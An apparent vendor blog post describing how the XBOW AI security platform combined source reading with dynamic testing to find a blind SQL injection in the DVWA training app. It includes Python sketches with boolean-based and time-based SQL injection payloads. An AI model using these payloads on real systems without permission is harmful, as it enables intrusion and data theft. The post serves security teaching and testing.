Tales from the Trace: How Agentic AI Merges Static and Dynamic Testing
Watch XBOW autonomously combine source code analysis with dynamic testing to discover SQL injection in minutes. This episode shows the AI reading code, crafting exploits, and validating vulnerabilities: the "holy grail" of application security testing in action.
Welcome to Tales from the Trace
Welcome to our first installment of "Tales from the Trace". Just like the cult TV series Tales from the Crypt, this series will reveal crafty twists, unexpected turns, and sometimes shocking discoveries. But instead of haunted houses and monsters, we'll be diving into what XBOW's AI-powered offensive security platform uncovers in application traces: surprising vulnerabilities, strange behaviors, and lessons learned along the way.
The Holy Grail: Static Meets Dynamic
Today's story demonstrates how effective it can be to combine source code analysis with dynamic testing in an automated workflow, a combination that is notoriously difficult for traditional automated scanners. With XBOW's AI capabilities, we get closer to the "holy grail" of application security testing: XBOW uses static knowledge from the code to guide dynamic attacks, while dynamic evidence confirms and validates real security gaps.
Relying only on traditional SAST solutions often leads to noisy results: false positives, dead code paths, or findings that are purely informational. On the other hand, relying only on traditional DAST tools can leave legitimate vulnerabilities undiscovered. By adding source code context to dynamic testing, XBOW dramatically improves both the accuracy of its findings and the likelihood of uncovering real, exploitable vulnerabilities.
This particular trace was generated while testing DVWA, a purposely vulnerable web application used for security training. For this run, I included the application's source code as part of the test configuration. Below we'll walk through the trace and show how XBOW understood the code, crafted a dynamic test, and ultimately surfaced a SQL injection vulnerability.
Chapter 1: Analyzing the Evidence
We can see that XBOW starts by unzipping and analyzing the contents of the source code that was supplied when the test was configured.
Chapter 2: Testing the Waters
Next, XBOW analyzes the normal behavior of the endpoint that we are about to test:
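The trace output itself isn't reproduced here, but conceptually this step amounts to establishing a baseline: send the endpoint a legitimate request and record what a normal response looks like, so later payloads have something to be compared against. The sketch below illustrates the idea; the DVWA URL, session cookie values, and parameter names are assumptions for illustration, not values taken from the actual run.

```python
# Minimal sketch: capture the endpoint's normal ("baseline") behavior.
# URL, cookies, and parameter names below are illustrative assumptions.
import requests

BASE_URL = "http://127.0.0.1/vulnerabilities/sqli_blind/"   # assumed local DVWA install
COOKIES = {"PHPSESSID": "<session-id>", "security": "low"}  # assumed session values

def query_endpoint(user_id: str) -> requests.Response:
    """Send the id parameter the way a normal user would and return the response."""
    return requests.get(
        BASE_URL,
        params={"id": user_id, "Submit": "Submit"},
        cookies=COOKIES,
        timeout=10,
    )

# Record what a legitimate request looks like (status code, body size, key
# strings in the body) so that later payloads can be compared against it.
baseline = query_endpoint("1")
print(baseline.status_code, len(baseline.text))
```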
Chapter 3: When Simple Attacks Fail
Our AI solver then attempts a simple SQLi payload and observes whether the endpoint responds as expected.
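The exact payload from the trace isn't shown here, but a first-pass probe of this kind might look like the sketch below, reusing the hypothetical query_endpoint() helper and baseline response from the previous sketch.

```python
# First-pass probe: fire a classic quote-based payload and check whether the
# response visibly deviates from the baseline. Generic guess, not the exact
# payload from the trace.
naive_payload = "1' OR '1'='1"
probe = query_endpoint(naive_payload)

if probe.text == baseline.text:
    print("No visible change; a smarter payload (or a look at the source) is needed.")
else:
    print("Response differs from baseline; worth a closer look.")
```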
Chapter 4: Reading Between the Lines
When the simple attack fails, XBOW dives into the endpoint's source code, hunting for sloppy coding that points to a smarter payload capable of exposing SQLi.
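As a rough illustration of what "hunting for sloppy coding" means in a PHP codebase like DVWA's, the toy sketch below scans the unzipped source for queries built directly from user-controlled variables. The directory name and regex are illustrative assumptions, not a description of XBOW's actual analysis.

```python
# Toy scan of the unzipped PHP source for SQL queries that interpolate raw
# user input. Path and regex are illustrative assumptions only.
import re
from pathlib import Path

SUSPICIOUS = re.compile(
    r"SELECT.*(\$_(GET|POST|REQUEST|COOKIE)\[|\$id)",  # raw input inside a query string
    re.IGNORECASE,
)

for php_file in Path("dvwa-source").rglob("*.php"):  # assumed extraction directory
    for lineno, line in enumerate(php_file.read_text(errors="ignore").splitlines(), 1):
        if SUSPICIOUS.search(line):
            print(f"{php_file}:{lineno}: {line.strip()}")
```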
Chapter 5: The Smoking Gun
Aha! XBOW follows the code path for the endpoint it's testing and spots the problem. It then explains why the first attempt failed and crafts a new payload tailored to exploit the flaw.
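The tailored payload from the trace isn't reproduced here, but the idea behind a boolean-based blind probe is easy to sketch: inject one condition that is true and one that is false, and check whether the responses diverge. If they do, the injected SQL is being evaluated by the database, which is exactly the behavioral signal a blind SQLi produces. The payload syntax below is a generic assumption, again reusing the hypothetical query_endpoint() helper.

```python
# Boolean-based blind probe: inject a TRUE condition and a FALSE condition;
# if the responses diverge, the condition is reaching the database.
true_resp = query_endpoint("1' AND '1'='1")
false_resp = query_endpoint("1' AND '1'='2")

if true_resp.text != false_resp.text:
    print("Responses diverge on TRUE vs FALSE conditions -> likely blind SQLi.")
else:
    print("No behavioral difference; this probe alone is inconclusive.")
```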
Chapter 6: Proof of Exploitation
Success! We've found a blind SQL injection vulnerability. Finally, we pass the finding to our SQLi verification tool to confirm exploitability and rule out false positives.
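The verification tool itself isn't shown in this post, but as a rough analogue of confirming exploitability, the sketch below uses a time-based check: if responses are delayed only when a SLEEP() condition is injected, the finding is very unlikely to be a false positive. The syntax is a MySQL-flavored assumption, and the query_endpoint() helper is the hypothetical one from the first sketch.

```python
# Rough analogue of a verification step (not XBOW's actual tool): a time-based
# check. A response that slows down only when SLEEP() is injected is strong
# evidence that the injected SQL really executes.
import time

def timed_request(user_id: str) -> float:
    """Return how long the endpoint takes to answer for a given id value."""
    start = time.monotonic()
    query_endpoint(user_id)  # hypothetical helper from the first sketch
    return time.monotonic() - start

control = timed_request("1' AND '1'='1")        # no artificial delay expected
delayed = timed_request("1' AND SLEEP(3)-- -")  # injected three-second delay (assumed syntax)

print(f"control: {control:.2f}s, sleep payload: {delayed:.2f}s")
if delayed - control > 2.5:
    print("Injected delay observed -> SQL injection confirmed.")
```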
The Verdict
While this was a simple case, XBOW was able to test the endpoint, locate the relevant source code, and craft an exploit confirming the vulnerability in just minutes. By contrast, a human tester might spend hours or even days sifting through thousands of lines of code to achieve the same result on an enterprise application. With agentic AI combining static analysis and dynamic validation, XBOW finds these issues quickly, delivering accurate results at scale and leaving no vulnerability lurking in the shadows.
Stay tuned for the next episode of Tales from the Trace!

